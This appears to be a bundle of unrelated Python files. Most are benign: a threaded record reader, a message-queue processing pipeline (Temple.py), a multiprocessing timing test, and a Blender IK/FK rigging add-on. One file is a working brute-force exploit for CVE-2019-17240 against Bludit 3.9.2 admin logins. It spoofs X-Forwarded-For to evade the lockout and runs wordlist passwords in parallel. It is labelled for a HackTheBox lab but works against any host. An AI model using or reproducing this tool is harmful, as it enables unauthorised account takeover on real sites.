    # Set when the queue is empty and we need a record
    self.queue_needs_record = threading.Event()
    # Set when a reader adds something to the queue
    self.queue_has_record = threading.Event()

  ############################
  def read(self):
    """
    Get the next record from queue or readers.
    """
    # If we only have one reader, there's no point making things
    # complicated. Just read, transform, return.
    if len(self.readers) == 1:
      return self._apply_transforms(self.readers[0].read())

    # Do we have anything in the queue? Note: safe to check outside of
    # lock, because we're the only method that actually *removes*
    # anything. So if tests True here, we're assured that there's
    # something there, and we lock before retrieving it. Advantage of
    # doing it this way is that we don't tie up queue lock while
    # processing transforms.
    if self.queue:
      logging.debug('read() - read requested; queue len is %d', len(self.queue))
      with self.queue_lock:
        record = self.queue.pop(0)
      return self._apply_transforms(record)

    # If here, nothing's in the queue. Note that, if we wanted to be
    # careful to never unnecessarily ask for more records, we should
    # put a lock around this, but the failure mode is somewhat benign:
    # we ask for more records when some are already on the way.
    logging.debug('read() - read requested and nothing in the queue.')

    # Some threads may have timed out while waiting to be called to
    # action; restart them.
    for i in range(len(self.readers)):
      if not self.reader_threads[i] or not self.reader_threads[i].is_alive():
        logging.info('read() - starting thread for Reader #%d', i)
        self.reader_returned_eof[i] = False
        thread = threading.Thread(target=self._run_reader, args=(i,))
        self.reader_threads[i] = thread
        thread.start()

    # Now notify all threads that we do in fact need a record.
    self.queue_needs_record.set()

    # Keep checking/sleeping until we've either got a record in the
    # queue or all readers have given us an EOF.
    while False in self.reader_returned_eof:
      logging.debug('read() - waiting for queue lock')
      with self.queue_lock:
        logging.debug('read() - acquired queue lock, queue length is %d',
                      len(self.queue))
        if self.queue:
          record = self.queue.pop(0)
          if not self.queue:
            self.queue_has_record.clear()  # only set/clear inside queue_lock
          logging.debug('read() - got record')
          return self._apply_transforms(record)
        else:
          self.queue_has_record.clear()

      # If here, nothing in queue yet. Wait
      logging.debug('read() - clear of queue lock, waiting for record')
      self.queue_has_record.wait(READER_TIMEOUT_WAIT)
      if not self.queue_has_record.is_set():
        logging.debug('read() - timed out waiting for record. Looping')
        logging.debug('read() - readers returned EOF: %s',
                      self.reader_returned_eof)

    # All readers have given us an EOF
    logging.debug('read() - all threads returned None; returning None')
    return None

  ############################
  def _run_reader(self, index):
    """
    Cycle through reading records from a readers[i] and putting them in queue.
    """
    while True:
      logging.debug('    Reader #%d waiting until record needed.', index)
      self.queue_needs_record.wait(READER_TIMEOUT_WAIT)

      # If we timed out waiting for someone to need a record, go
      # home. We'll get started up again if needed.
      if not self.queue_needs_record.is_set():
        logging.debug('    Reader #%d timed out - exiting.', index)
        return

      # Else someone needs a record - leap into action
      logging.debug('    Reader #%d waking up - record needed!', index)

      # Guard against re-entry
      with self.reader_locks[index]:
        record = self.readers[index].read()

      # If reader returns None, it's done and has no more data for
      # us. Note that it's given us an EOF and exit.
      if record is None:
        logging.info('    Reader #%d returned None, is done', index)
        self.reader_returned_eof[index] = True
        return

      logging.debug('    Reader #%d has record, released reader_lock.', index)

      # Add record to queue and note that an append event has
      # happened.
      with self.queue_lock:
        # No one else can mess with queue while we add record. Once we've
        # added it, set flag to say there's something in the queue.
        logging.debug('    Reader #%d has queue lock - adding and notifying.',
                      index)
        self.queue.append(record)
        self.queue_has_record.set()
        self.queue_needs_record.clear()

      # Now clear of queue_lock
      logging.debug('    Reader #%d released queue_lock - looping', index)

  ############################
  def _apply_transforms(self, record):
    """
    Apply the transforms in series.
    """
    if record:
      for t in self.transforms:
        record = t.transform(record)
        if not record:
          break
    return record

  ############################
  def _check_reader_formats(self):
    """
    Check that Reader outputs are compatible with each other and with
    Transform inputs. Return None if not.
    """
    # Find the lowest common format among readers
    lowest_common = self.readers[0].output_format()
    for reader in self.readers:
      lowest_common = reader.output_format().common(lowest_common)
      if not lowest_common:
        return None

    logging.debug('Lowest common format for readers is "%s"', lowest_common)
    if not self.transforms:
      return lowest_common

    # Now check the transforms in series - output of each is input of
    # next one.
    for transform in self.transforms:
      if not transform.input_format().can_accept(lowest_common):
        logging.error('Transform %s can not accept input format %s',
                      transform, lowest_common)
        return None
      lowest_common = transform.output_format()

    # Our final format is the lowest common format from last transform
    return lowest_common
|
Temple.py | # coding=utf-8
# Copyright 2019 StrTrek Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# System Required
import time
import logging
from multiprocessing import Process, Pipe, Queue
# Outer Required
# Inner Required
from Babelor.Presentation import URL
from Babelor.Session import MQ
from Babelor.Data import SQL, FTP, FTPD, TOMAIL, FILE
# Global Parameters
from Babelor.Config import CONFIG
def priest(conn: URL, queue_ctrl: Queue, pipe_in: Pipe):
    """Pump messages from the MQ at `conn` into `pipe_in`.

    Blocks for an initial True on queue_ctrl, then pulls and forwards
    messages until a False control value arrives, after which the
    control queue is closed.
    """
    mq = MQ(conn)
    is_active = queue_ctrl.get()
    while is_active:
        if not queue_ctrl.empty():
            # A new control value is waiting - refresh the flag first.
            is_active = queue_ctrl.get()
            continue
        msg_in = mq.pull()
        logging.info("TEMPLE::{0} pull:{1}".format(conn, msg_in))
        pipe_in.send(msg_in)
        logging.debug("TEMPLE::{0}::PIPE IN send:{1}".format(conn, msg_in))
    queue_ctrl.close()
class TEMPLE:
    """A processing node: a 'priest' child process pulls messages from the
    MQ at `conn` and pipes them to a 'believer' child process, which runs
    one of the sender/treater/receiver roles defined in this module."""

    def __init__(self, conn: (URL, str)):
        # "tcp://*:<port>"
        self.me = conn
        # Duplex pipe: the priest sends on end [0], the believer reads end [1].
        self.priest_pipe_in = Pipe()
        # Control channels: True keeps a child's loop alive, False stops it.
        self.priest_queue_ctrl = Queue(CONFIG.MQ_MAX_DEPTH)
        self.believer_queue_ctrl = Queue(CONFIG.MQ_MAX_DEPTH)
        self.priest = None      # Process running priest()
        self.believer = None    # Process running the selected role

    def start(self):
        """Launch the priest process (MQ -> pipe pump)."""
        is_active = True
        self.priest_queue_ctrl.put(is_active)
        self.priest = Process(target=priest,
                              args=(self.me, self.priest_queue_ctrl, self.priest_pipe_in[0]))
        self.priest.start()

    def open(self, role: str, func: callable = None):
        """Start the priest plus a believer process for `role`.

        :param role: "sender", "treater", "encrypter", or "receiver";
                     anything else falls back to treater.
        :param func: optional user hook applied to each message.
        """
        is_active = True
        self.start()
        self.believer_queue_ctrl.put(is_active)
        if role in ["sender"]:
            self.believer = Process(target=sender, args=(self.priest_pipe_in[1], self.believer_queue_ctrl, func))
        elif role in ["treater", "encrypter"]:
            self.believer = Process(target=treater, args=(self.priest_pipe_in[1], self.believer_queue_ctrl, func))
        elif role in ["receiver"]:
            self.believer = Process(target=receiver, args=(self.priest_pipe_in[1], self.believer_queue_ctrl, func))
        else:  # default is treater
            self.believer = Process(target=treater, args=(self.priest_pipe_in[1], self.believer_queue_ctrl, func))
        self.believer.start()

    def close(self):
        """Stop the believer process and drain its control queue."""
        is_active = False
        if isinstance(self.believer, Process):
            self.believer_queue_ctrl.put(is_active)
            # Give the child a chance to see the False before terminating it.
            time.sleep(CONFIG.MQ_BLOCK_TIME)
            self.believer.terminate()
        while not self.believer_queue_ctrl.empty():
            self.believer_queue_ctrl.get()
        self.believer = None

    def stop(self):
        """Stop the believer, then the priest, draining both control queues."""
        self.close()
        is_active = False
        if isinstance(self.priest, Process):
            self.priest_queue_ctrl.put(is_active)
            time.sleep(CONFIG.MQ_BLOCK_TIME)
            self.priest.terminate()
        while not self.priest_queue_ctrl.empty():
            self.priest_queue_ctrl.get()
        self.priest = None
def allocator(conn: URL):
    """Instantiate the I/O adapter matching conn.scheme.

    Returns None when conn is None or the scheme has no adapter.
    """
    if conn is None:
        return None
    adapters = {
        "oracle": SQL,
        "mysql": SQL,
        "tcp": MQ,
        "ftp": FTP,
        "ftpd": FTPD,
        "tomail": TOMAIL,
        "file": FILE,
    }
    adapter_cls = adapters.get(conn.scheme)
    if adapter_cls is None:
        return None
    return adapter_cls(conn)
def sender(pipe_in: Pipe, queue_ctrl: Queue, func: callable = None):
    """Believer role "sender": for each routing message from the pipe, read
    the payload from its origination, pass it through the optional
    encryption / treatment / func stages, and deliver it to destination.

    :param pipe_in: Pipe       # message pipe (MSG,)
    :param queue_ctrl: Queue   # control channel ("is_active",):(bool,)
    :param func: callable      # optional user-defined processing step
    :return: None
    """
    is_active = queue_ctrl.get()
    while is_active:
        # ----------------------------------------- Queue
        if queue_ctrl.empty():
            try:
                msg_sender = pipe_in.recv()
                logging.info("TEMPLE::SENDER PIPE IN recv:{0}".format(msg_sender))
            except EOFError:
                # Priest end of the pipe closed - shut down.
                is_active = False
                continue
            # Resolve each endpoint URL of the message to an adapter (or None).
            origination = allocator(msg_sender.origination)  # Data.read(msg)
            treatment = allocator(msg_sender.treatment)  # MessageQueue
            encryption = allocator(msg_sender.encryption)  # MessageQueue
            destination = allocator(msg_sender.destination)  # MessageQueue
            # --------- origination -----------------------------------------
            if isinstance(origination, MQ):
                msg_origination = origination.request(msg_sender)
                logging.debug("TEMPLE::SENDER::{0}::ORIG request:{1}".format(msg_sender.origination, msg_origination))
            else:
                msg_origination = origination.read(msg_sender)
                logging.debug("TEMPLE::SENDER::{0}::ORIG read:{1}".format(msg_sender.origination, msg_origination))
            # --------- encryption ------------------------------------------
            if encryption is None:
                msg_encryption = msg_origination
            else:
                msg_encryption = encryption.request(msg_origination)
                logging.debug("TEMPLE::SENDER::{0}::ENCRYPT request:{1}".format(msg_sender.encryption, msg_encryption))
            del msg_origination  # release the intermediate message promptly
            # --------- treatment -------------------------------------------
            if treatment is None:
                msg_treatment = msg_encryption
            else:
                msg_treatment = treatment.request(msg_encryption)
                logging.debug("TEMPLE::SENDER::{0}::TREAT request:{1}".format(msg_sender.treatment, msg_treatment))
            del msg_encryption
            # --------- function --------------------------------------------
            if func is None:
                msg_function = msg_treatment
            else:
                msg_function = func(msg_treatment)
                logging.debug("TEMPLE::SENDER func:{0}".format(msg_function))
            del msg_treatment
            # --------- destination -----------------------------------------
            if isinstance(destination, MQ):
                destination.push(msg_function)
                logging.info("TEMPLE::SENDER::{0}::DEST push:{1}".format(msg_sender.destination, msg_function))
            else:
                destination.write(msg_function)
                logging.info("TEMPLE::SENDER::{0}::DEST write:{1}".format(msg_sender.destination, msg_function))
        else:
            # A control value is waiting - refresh the active flag.
            is_active = queue_ctrl.get()
    else:
        # Loop ended without break: drain the control queue before exiting.
        while not queue_ctrl.empty():
            queue_ctrl.get()
def receiver(pipe_in: Pipe, queue_ctrl: Queue, func: callable = None):
    """Believer role "receiver": pull the payload from the message's
    origination MQ, pass it through the optional encryption / treatment /
    func stages, and write it to the destination.

    :param pipe_in: Pipe       # message pipe (MSG,)
    :param queue_ctrl: Queue   # control channel ("is_active",):(bool,)
    :param func: callable      # optional user-defined processing step
    :return: None
    """
    is_active = queue_ctrl.get()
    while is_active:
        # ----------------------------------------- Queue
        if queue_ctrl.empty():
            try:
                msg_receiver = pipe_in.recv()
                logging.info("TEMPLE::RECEIVER PIPE IN recv:{0}".format(msg_receiver))
            except EOFError:
                # Priest end of the pipe closed - shut down.
                is_active = False
                continue
            # Resolve each endpoint URL of the message to an adapter (or None).
            origination = allocator(msg_receiver.origination)  # MessageQueue
            treatment = allocator(msg_receiver.treatment)  # MessageQueue
            encryption = allocator(msg_receiver.encryption)  # MessageQueue
            destination = allocator(msg_receiver.destination)  # Data.write
            # --------- origination -----------------------------------------
            if isinstance(origination, MQ):
                msg_origination = origination.pull()
                logging.info("TEMPLE::RECEIVER::{0}::ORIG pull:{1}".format(msg_receiver.origination, msg_origination))
            else:
                msg_origination = origination.read(msg_receiver)
                logging.info("TEMPLE::RECEIVER::{0}::ORIG read:{1}".format(msg_receiver.origination, msg_origination))
            # --------- encryption ------------------------------------------
            if encryption is None:
                msg_encryption = msg_origination
            else:
                msg_encryption = encryption.request(msg_origination)
                logging.debug("TEMPLE::RECEIVER::{0}::ENCRYPT request:{1}".format(msg_receiver.encryption,
                                                                                 msg_encryption))
            del msg_origination  # release the intermediate message promptly
            # --------- treatment -------------------------------------------
            if treatment is None:
                msg_treatment = msg_encryption
            else:
                msg_treatment = treatment.request(msg_encryption)
                logging.debug("TEMPLE::RECEIVER::{0}::TREAT request:{1}".format(msg_receiver.treatment,
                                                                               msg_treatment))
            del msg_encryption
            # --------- function --------------------------------------------
            if func is None:
                msg_function = msg_treatment
            else:
                msg_function = func(msg_treatment)
                logging.debug("TEMPLE::RECEIVER func:{0}".format(msg_function))
            del msg_treatment
            # --------- destination -----------------------------------------
            if isinstance(destination, MQ):
                destination.request(msg_function)
                logging.info("TEMPLE::RECEIVER::{0}::DEST request:{1}".format(msg_receiver.destination,
                                                                              msg_function))
            else:
                destination.write(msg_function)
                logging.info("TEMPLE::RECEIVER::{0}::DEST write:{1}".format(msg_receiver.destination,
                                                                            msg_function))
        else:
            # A control value is waiting - refresh the active flag.
            is_active = queue_ctrl.get()
    else:
        # Loop ended without break: drain the control queue before exiting.
        while not queue_ctrl.empty():
            queue_ctrl.get()
def treater(pipe_in: Pipe, queue_ctrl: Queue, func: callable = None):
    """Believer role "treater": transform messages, either serving as an MQ
    responder (origination is an MQ) or by reading and treating directly.

    :param pipe_in: Pipe       # message pipe (MSG,)
    :param queue_ctrl: Queue   # control channel ("is_active",):(bool,)
    :param func: callable      # optional user-defined processing step
    :return: None
    """
    def treat_msg(msg_orig):
        """Apply encryption -> treatment -> func, then deliver the result.

        NOTE: closes over `encryption`/`treatment`/`destination` from the
        enclosing scope; these are rebound by the outer loop for each
        incoming message before this is called.
        """
        # --------- encryption ------------------------------------------
        if encryption is None:
            msg_encryption = msg_orig
        else:
            msg_encryption = encryption.request(msg_orig)
            logging.debug("TEMPLE::TREATER::{0}::ENCRYPT request:{1}".format(msg_orig.encryption,
                                                                            msg_encryption))
        # --------- treatment -------------------------------------------
        if treatment is None:
            msg_treatment = msg_encryption
        else:
            msg_treatment = treatment.request(msg_encryption)
            logging.debug("TEMPLE::TREATER::{0}::TREAT request:{1}".format(msg_orig.treatment,
                                                                          msg_treatment))
        del msg_encryption
        # --------- function --------------------------------------------
        if func is None:
            msg_func = msg_treatment
        else:
            msg_func = func(msg_treatment)
            logging.debug("TEMPLE::TREATER func:{0}".format(msg_func))
        del msg_treatment
        # --------- destination -----------------------------------------
        if destination is None:
            # No destination: the treated message is only returned.
            logging.info("TEMPLE::TREATER::NONE::DEST return:{0}".format(msg_func))
        else:
            if isinstance(destination, MQ):
                destination.request(msg_func)
                logging.info("TEMPLE::TREATER::{0}::DEST request:{1}".format(msg_orig.destination, msg_func))
            else:
                destination.write(msg_func)
                logging.info("TEMPLE::TREATER::{0}::DEST write:{1}".format(msg_orig.destination, msg_func))
        return msg_func

    is_active = queue_ctrl.get()
    while is_active:
        if queue_ctrl.empty():
            try:
                msg_treater = pipe_in.recv()
                logging.info("TEMPLE::TREATER PIPE IN recv:{0}".format(msg_treater))
            except EOFError:
                # Priest end of the pipe closed - shut down.
                is_active = False
                continue
            # Resolve each endpoint URL of the message to an adapter (or None).
            origination = allocator(msg_treater.origination)  # Data.read()
            treatment = allocator(msg_treater.treatment)  # MessageQueue
            encryption = allocator(msg_treater.encryption)  # MessageQueue
            destination = allocator(msg_treater.destination)  # Data.write()
            # --------- origination -----------------------------------------
            if isinstance(origination, MQ):
                # Serve requests on the MQ; treat_msg handles each one.
                origination.reply(func=treat_msg)
            else:
                msg_origination = origination.read(msg_treater)
                logging.info("TEMPLE::TREATER::{0}::ORIG read:{1}".format(msg_treater.origination, msg_origination))
                treat_msg(msg_origination)
        else:
            # A control value is waiting - refresh the active flag.
            is_active = queue_ctrl.get()
    else:
        # Loop ended without break: drain the control queue before exiting.
        while not queue_ctrl.empty():
            queue_ctrl.get()
|
CVE-2019-17240_bludit-3.9.2_pwd-bruteforce_multi.py | #!/usr/bin/env python3
#coding: utf8
#CVE-2019-17240 Bludit <= 3.9.2 Admin Portal login brute-force tool for (HTB - blunder)
#Need valid username to use
import multiprocessing
import sys
import time
from multiprocessing import Queue
import re
import requests
def worker(cred_queue):
    """Pull candidate passwords from cred_queue and try each against the
    Bludit admin login.

    Relies on the module globals `login_url` and `username` set in
    __main__ (inherited by the forked child process). Exits when the
    queue stays empty for 10 seconds, on a request failure, or when a
    valid password is found.
    """
    # The Empty exception lives in the stdlib `queue` module; the original
    # `except Queue.Empty:` raised AttributeError because
    # multiprocessing.Queue is a factory function with no Empty attribute.
    import queue
    print('Starting new worker thread.')
    while True:
        try:
            password = cred_queue.get(timeout=10)
        except queue.Empty:
            # Queue drained and nothing new for 10s - this worker is done.
            return
        try:
            session = requests.Session()
            login_page = session.get(login_url)
            csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
            print('[*] Trying: {p}'.format(p=password))
            headers = {
                # CVE-2019-17240: Bludit keys its brute-force blacklist on
                # X-Forwarded-For, so a fresh value per attempt bypasses it.
                'X-Forwarded-For': password,
                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
                'Referer': login_url
            }
            data = {
                'tokenCSRF': csrf_token,
                'username': username,
                'password': password,
                'save': ''
            }
            login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)
            if '/admin/dashboard' in login_result.headers.get('location', ''):
                print()
                print('SUCCESS: Password found!')
                print('Use {u}:{p} to login.'.format(u=username, p=password))
                print()
                # Return instead of calling cleanup(procs): a child process
                # must not terminate/join its siblings ("can only join a
                # child process" AssertionError - see the traceback quoted
                # below). The other workers drain the queue and time out on
                # their own.
                return
        except Exception as e:
            # Report the actual exception (the original printed a traceback
            # object from sys.exc_info()[2], which is unreadable).
            print("Failed on: {0} {1}".format(password, e))
            return
        # This is useful for rate-limiting. Uncomment to use.
        # time.sleep(.5)
#For some reason I still can't get this to exit properly.
#TODO: Fix this to clean up all threads and exit gracefully upon success
#below is the error output
"""
Process Process-7:
Traceback (most recent call last):
File "/usr/lib/python3.8/multiprocessing/process.py", line 315, in _bootstrap
self.run()
File "/usr/lib/python3.8/multiprocessing/process.py", line 108, in run
self._target(*self._args, **self._kwargs)
File "bludit-3.9.2-bruteForce-multi.py", line 59, in worker
cleanup(procs)
File "bludit-3.9.2-bruteForce-multi.py", line 99, in cleanup
p.join()
File "/usr/lib/python3.8/multiprocessing/process.py", line 147, in join
assert self._parent_pid == os.getpid(), 'can only join a child process'
AssertionError: can only join a child process
"""
def file_to_list(wList):
    """Load the wordlist at path `wList`, one stripped entry per line."""
    # latin1 encoding is necessary to get `rockyou.txt` to work;
    # this may cause problems with other wordlists.
    # TODO: add a check for the encoding type of the input file.
    with open(wList, encoding='latin1') as word_file:
        return [line.strip() for line in word_file.readlines()]
def cleanup(processes):
    """Forcefully stop every process in `processes`, then reap each one."""
    for proc in processes:
        proc.terminate()
        proc.join()
if __name__ == '__main__':
    print("#CVE-2019-17240")
    print("#Bludit <= 3.9.2 Admin Portal login brute-force tool")
    if len(sys.argv) != 4:
        print('Usage: python3 bludit-3.9.2-bruteForce-multi.py http://<ip> <username> </path/to/wordlist>')
        sys.exit()
    host = sys.argv[1]
    # Module globals read by worker() in the forked child processes.
    login_url = host + '/admin/login'
    username = sys.argv[2]
    wordlist = sys.argv[3]
    threads = 10  # number of worker processes to spawn
    passwords = file_to_list(wordlist)
    cred_queue = multiprocessing.Queue()
    procs = []
    print('Starting {0} worker threads.'.format(threads))
    # Workers start before the queue is loaded; each blocks up to 10s
    # on cred_queue.get(), so they survive until passwords arrive.
    for i in range(threads):
        p = multiprocessing.Process(target=worker, args=(cred_queue, ))
        procs.append(p)
        p.start()
    print('Loading credential queue.')
    for pwd in passwords:
        cred_queue.put((pwd))
|
test.py | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 19 00:50:01 2019
@author: nac2313
"""
#module used for testing new code
import time
import multiprocessing
def basic_func(x):
    """Classify x as 'zero', 'even', or 'odd'."""
    if x == 0:
        return 'zero'
    return 'even' if x % 2 == 0 else 'odd'
def multiprocessing_func(x):
    """Square x, pause to simulate work, and report the result's parity."""
    squared = x * x
    time.sleep(2)
    print('{} squared results in a/an {} number'.format(x, basic_func(squared)))
    return squared
if __name__ == '__main__':
    # Launch one process per input and time the whole batch; the 2s sleeps
    # run concurrently, so the total should be close to 2s, not 20s.
    starttime = time.time()
    processes = []
    for i in range(0,10):
        p = multiprocessing.Process(target=multiprocessing_func, args=(i,))
        processes.append(p)
        p.start()
    # Wait for every worker before reporting the elapsed time.
    for process in processes:
        process.join()
    print('That took {} seconds'.format(time.time() - starttime))
DtbIKBones.py | import sys
import os
import math
sys.path.append(os.path.dirname(__file__))
import bpy
import mathutils
from copy import deepcopy
from . import DazRigBlend
from . import DtbShapeKeys
from . import DataBase
from . import ToRigify
from . import Global
from . import Versions
from . import DtbDazMorph
from . import DtbOperators
from . import DtbPanels
from . import DtbMaterial
from . import CustomBones
from . import Poses
from . import Animations
from . import Util
from . import DtbCommands
from bpy.props import EnumProperty
from bpy.props import BoolProperty
from bpy.props import StringProperty
import threading
import time
BV = Versions.getBV()
num_bones = [6, 6, 3, 3]
ik_name = ['rHand_IK', 'lHand_IK', 'rShin_IK', 'lShin_IK']
bone_name = ['rHand', 'lHand', 'rShin', 'lShin']
bone_name_rigify = ['MCH-upper_arm_ik.R','MCH-upper_arm_ik.L','MCH-thigh_ik.R','MCH-thigh_ik.L']
mute_bones = []
ik_access_ban = False
obj_exsported = ""
def get_influece_data_path(bname):
    """Locate bone `bname`'s IK constraint on the active armature.

    Returns a [constraint, 'influence'] pair suitable for
    get_ik_influence()/set_ik_influence(), or None when the armature,
    bone, or constraint is missing. (Function-name typo is preserved:
    external callers use this name.)
    """
    amtr = Global.getAmtr()
    if amtr is None:
        return
    bones = amtr.pose.bones
    if bname in bones:
        ik_constraint_name = bname + '_IK'
        for constraint in bones[bname].constraints:
            if ik_constraint_name in constraint.name:
                return [constraint, 'influence']
    return None
def get_ik_influence(data_path):
    """Return the current value of attribute data_path[1] on data_path[0].

    data_path is the [constraint, attribute-name] pair produced by
    get_influece_data_path(). getattr() replaces the original eval() of a
    generated code string - same result, no dynamic code execution.
    """
    return getattr(data_path[0], data_path[1])
def set_ik_influence(data_path, val):
    """Set attribute data_path[1] on data_path[0] to float(val).

    data_path is the [constraint, attribute-name] pair produced by
    get_influece_data_path(). setattr() replaces the original exec() of a
    '%f'-formatted code string, which both executed generated code and
    silently rounded val to 6 decimal places.
    """
    setattr(data_path[0], data_path[1], float(val))
def set_ik(data_path):
    """Fully enable the IK constraint referenced by data_path
    (a [constraint, 'influence'] pair from get_influece_data_path)."""
    set_ik_influence(data_path, 1.0)

def set_fk(data_path):
    """Fully disable the IK constraint (i.e. switch the chain to FK)."""
    set_ik_influence(data_path, 0.0)
def set_translation(matrix, loc):
    """Return `matrix` rebuilt with its translation replaced by `loc`,
    keeping the original rotation and scale."""
    _, rotation, scale_vec = matrix.decompose()
    rot = rotation.to_matrix().to_4x4()
    scale = mathutils.Matrix.Scale(1, 4, scale_vec)
    translate = mathutils.Matrix.Translation(loc)
    # Blender 2.80 changed matrix multiplication from '*' to '@'.
    if BV < 2.80:
        return translate * (rot * scale)
    return translate @ (rot @ scale)
# TODO: Integrate this setting into the import setup
def set_scene_settings(key_count):
    """Set the scene's playable range to [0, key_count-1] and apply the
    standard armature display options.

    :param key_count: number of imported animation keyframes.
    """
    scene = bpy.context.scene
    # Set start and end playable range for the animations.
    scene.frame_start = 0
    scene.frame_end = key_count - 1
    scene.frame_current = 0
    # Set armature display settings
    Global.setOpsMode('POSE')
    armature = Global.getAmtr().data
    armature.display_type = 'OCTAHEDRAL'
    armature.show_names = False
    armature.show_axes = False
    armature.show_bone_custom_shapes = True
def manageKeyFrame(index, flg_to_ik, switch):
    """Keyframe bookkeeping for an IK<->FK switch on limb `index`.

    :param index: 0/1 = right/left hand, 2/3 = right/left shin
                  (see bone_name); 1000 is a no-op sentinel.
    :param flg_to_ik: True when switching FK -> IK, False for IK -> FK.
    :param switch: phase of the switch:
                   -1 = before: collect the affected bone chain into the
                        module-global mute_bones, key the previous poses,
                        and mute their F-curves;
                    0 = at the switch: insert keys at the current frame;
                    1 = after: unmute all F-curves and clear mute_bones.
    """
    global mute_bones
    amt = Global.getAmtr()
    if index == 1000:
        # Sentinel value: explicit no-op request.
        return
    if amt is None:
        return
    if 'NG' in mute_bones:
        # A previous pass flagged an error state - do nothing.
        return
    if amt.animation_data is None:
        return
    act = amt.animation_data.action
    if act is None:
        return
    ckey = bpy.context.scene.frame_current
    if switch < 0:
        # Collect the chain of bones this limb's IK affects: walk up
        # num_bones[index] parents from the limb bone, plus the IK target.
        mute_bones = []
        my_bone = amt.pose.bones[bone_name[index]]
        num = num_bones[index]
        for i in range(num):
            mute_bones.append(my_bone.name)
            my_bone = my_bone.parent
        mute_bones.append(ik_name[index])
        if index > 1:
            # Legs additionally involve the pole target and the foot.
            poles = ['', '', 'rShin_P', 'lShin_P']
            foots = ['', '', 'rFoot', 'lFoot']
            mute_bones.append(poles[index])
            mute_bones.append(foots[index])
        if flg_to_ik:
            mute_bones.append("hip")
    if switch < 0:
        # Find the keyframes just before the current frame so the old pose
        # is pinned down before its curves get muted.
        first_cr = bpy.context.scene.frame_start
        first_ik = first_cr
        prev_cr = -999
        fkp_ik = Find_KeyFrame_Point(act.fcurves, mute_bones, ['influence', ik_name[index], bone_name[index]], ckey)
        prev_ik = fkp_ik.previous
        first_ik = fkp_ik.skip_first(first_ik)
        if index > 1:
            foots = ['', '', 'rFoot', 'lFoot']
            fkp_cr = Find_KeyFrame_Point(act.fcurves, mute_bones, ['influence', 'Copy Rotation', foots[index]], ckey)
            prev_cr = fkp_cr.previous
            first_cr = fkp_cr.skip_first(first_cr)
        # -999 marks "no frame to key" for the inserts below.
        if first_cr >= prev_cr:
            first_cr = -999
        if first_ik >= prev_ik:
            first_ik = -999
        for b in mute_bones:
            for c in amt.pose.bones.get(b).constraints:
                if (index > 1 and c.name == 'Copy Rotation' and b[1:] == 'Foot'):
                    if first_cr > -1:
                        c.keyframe_insert(data_path='influence', frame=first_cr)
                    if prev_cr > -1:
                        c.keyframe_insert(data_path='influence', frame=prev_cr)
                if c.name == ik_name[index]:
                    if first_ik > -1:
                        c.keyframe_insert(data_path='influence', frame=first_ik)
                    if prev_ik > -1:
                        c.keyframe_insert(data_path='influence', frame=prev_ik)
    if switch == 0:
        # Key the switch itself at the current frame: FK bones get rotation
        # keys, IK controls get location (and, for legs, rotation) keys.
        for b in mute_bones:
            if flg_to_ik == False:
                if (b.endswith("_IK") or b.endswith("_P")) == False:
                    amt.pose.bones[b].keyframe_insert(data_path='rotation_euler', frame=ckey)
            else:
                if (b.endswith("_IK") or b.endswith("_P")):
                    amt.pose.bones[b].keyframe_insert(data_path='location', frame=ckey)
                    if index > 1 and b.endswith("_IK"):
                        amt.pose.bones[b].keyframe_insert(data_path='rotation_euler', frame=ckey)
            for c in amt.pose.bones.get(b).constraints:
                if (index > 1 and c.name == 'Copy Rotation') or c.name == ik_name[index]:
                    c.keyframe_insert(data_path='influence', frame=ckey)
    else:
        # switch > 0: unmute everything; switch < 0: mute the curves of the
        # bones collected above (data_path contains the bone name in quotes).
        for fcu in act.fcurves:
            if switch > 0 and fcu.mute:
                fcu.mute = False
            else:
                names = fcu.data_path.split(sep='"', maxsplit=2)
                if len(names) < 2:
                    continue
                name = names[1]
                if name in mute_bones and switch < 0:
                    fcu.mute = True
    if switch == 1:
        mute_bones = []
class Find_KeyFrame_Point():
    """Scan an action's F-curves for the keyframe immediately before a given
    frame among curves matching `find_keys`, while also tracking frames on
    curves that match ALL of `skip_keys`.

    After construction:
      previous         frame of the closest earlier matching keyframe, or -999
      find_collection  matching keyframe frames, sorted descending
      skip_collection  frames on the skip curves, sorted descending
    """
    # NOTE(review): class-level defaults are shared mutable lists, but
    # __init__ always rebinds them per instance, so no aliasing occurs.
    find_collection = []
    skip_collection = []
    previous = -999

    def skip_first(self, now_first):
        """Return -999 instead of `now_first` when it coincides with the
        earliest collected skip-frame (nothing needs keying before it);
        otherwise return `now_first` unchanged."""
        if len(self.skip_collection) > 1:
            wk = self.skip_collection[len(self.skip_collection)-1]
            if wk == now_first:
                return -999
            else:
                return now_first
        else:
            return now_first

    def __init__(self, fcurves, find_keys, skip_keys, now_posision):
        """Collect keyframe frames earlier than `now_posision`.

        :param fcurves: action F-curves to scan.
        :param find_keys: a curve matches if ANY of these appears in its data_path.
        :param skip_keys: a curve is a skip-curve if ALL of these appear.
        :param now_posision: current frame; only earlier keys are collected.
        """
        self.find_collection = []
        self.skip_collection = []
        self.previous = -999
        for fc in fcurves:
            # Any find_key in the data path marks this curve as interesting.
            for fk in find_keys:
                if (fk in fc.data_path):
                    for point in fc.keyframe_points:
                        if point.co[0] < now_posision and (point.co[0] in self.find_collection) == False:
                            self.find_collection.append(point.co[0])
            # A curve only counts as a skip-curve when it matches ALL skip_keys.
            err = False
            for sk in skip_keys:
                if (sk in fc.data_path) == False:
                    err = True
                    break
            if err == False:
                for point in fc.keyframe_points:
                    if point.co[0] < now_posision and (point.co[0] in self.skip_collection) == False:
                        self.skip_collection.append(point.co[0])
        # Sort newest-first so index 0 is the closest earlier frame.
        self.find_collection.sort()
        self.find_collection.reverse()
        self.skip_collection.sort()
        self.skip_collection.reverse()
        if len(self.find_collection) <= 0:
            self.previous = -999
        elif len(self.skip_collection) <= 0 or self.skip_collection[0] < self.find_collection[0]:
            self.previous = self.find_collection[0]
